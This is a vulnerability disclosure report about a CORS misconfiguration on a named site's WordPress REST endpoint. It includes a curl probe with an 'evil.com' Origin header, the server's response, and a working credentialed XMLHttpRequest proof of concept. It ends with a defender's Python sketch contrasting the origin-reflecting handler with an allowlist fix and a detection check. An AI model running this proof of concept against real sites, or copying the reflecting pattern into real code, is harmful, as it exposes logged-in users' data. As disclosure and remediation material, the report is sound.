CORS MISCONFIGURATION - website issue #11

@Dgirlwhohacks

Description

Hey Sec Team

CORS MISCONFIGURATION

I have found a CORS misconfiguration at your main domain https://www.barnbridge.com/. The site specifies the header Access-Control-Allow-Credentials: true; third-party sites may be able to carry out privileged actions and retrieve sensitive information. This bug could be used to steal users' information or force the user to execute unwanted actions, as long as a legitimate, logged-in user is lured into accessing an attacker-controlled HTML page. The CORS misconfiguration is found on https://www.barnbridge.com/wp-json/, as "Access-Control-Allow-Origin" is dynamically fetched from the client Origin header with "Credentials" set to true.

Exploiting CORS misconfiguration.

root@kali:~# curl -I https://www.barnbridge.com/wp-json/ -H 'Origin:evil.com'

HTTP/2 200
date: Mon, 26 Apr 2021 05:39:21 GMT
server: Apache
x-powered-by: PHP/7.3.23
x-robots-tag: noindex
link: https://barnbridge.com/wp-json/; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
allow: GET
access-control-allow-origin: http://evil.com
access-control-allow-methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
access-control-allow-credentials: true

  1. Save the code as any.html, open it from https://example.com in any browser, and you would find it pops up user information like the attachment.

Code:

<script>
  // Credentialed cross-origin read of the REST endpoint (the PoC from the report)
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get', 'https://www.barnbridge.com/wp-json/', true);
  req.withCredentials = true;
  req.send('{}');

  function reqListener() {
    alert(this.responseText);
  }
</script>

Remediation:

Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

Impact:

Also, if the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.

Fix it ASAP

Best Regards,
barn
Divya Singh - @Dgirlwhohacks
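As an added illustration from the defender's side (not part of the report or the site's code): the origin-reflecting handler the curl output implies, beside an allowlist-based replacement matching the remediation, plus a check that reads response headers the way the report reads them. TRUSTED_ORIGINS, SAMPLE_RESPONSE and all function names are constructed for this example.

```python
from typing import Mapping, Optional

# Constructed allowlist; a real deployment lists its own front-end origins.
TRUSTED_ORIGINS = frozenset({"https://www.example.com", "https://app.example.com"})


def cors_headers_reflecting(origin: Optional[str]) -> dict:
    """The misconfigured pattern: echo whatever Origin the client sent and also
    allow credentials, so any page can read a logged-in user's response.
    Kept only as the 'before' for comparison."""
    if not origin:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers_allowlisted(origin: Optional[str]) -> dict:
    """The remediation: exact-match the Origin against a fixed allowlist and emit
    CORS headers only on a match. 'Vary: Origin' keeps a cache from serving one
    origin's Access-Control-Allow-Origin value to another."""
    if origin in TRUSTED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}  # no CORS headers: the browser blocks the cross-origin read


def is_credentialed_reflection(sent_origin: str, response: Mapping[str, str]) -> bool:
    """Classify a response to a probe with an untrusted Origin: flag it when
    Allow-Origin reflects that origin (compared by host, since the report shows
    'evil.com' coming back as 'http://evil.com') or is '*', while
    Allow-Credentials is true."""
    lower = {k.lower(): v.strip() for k, v in response.items()}
    acao = lower.get("access-control-allow-origin", "")
    creds = lower.get("access-control-allow-credentials", "").lower() == "true"

    def host(o: str) -> str:
        return o.split("://", 1)[-1].rstrip("/").lower()

    reflected = acao == "*" or (acao != "" and host(acao) == host(sent_origin))
    return reflected and creds


# Constructed sample mirroring the two relevant headers quoted in the report.
SAMPLE_RESPONSE = {"access-control-allow-origin": "http://evil.com",
                   "access-control-allow-credentials": "true"}
```

The allowlisted handler returns no CORS headers for an unknown origin, so the same probe against it is not flagged.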
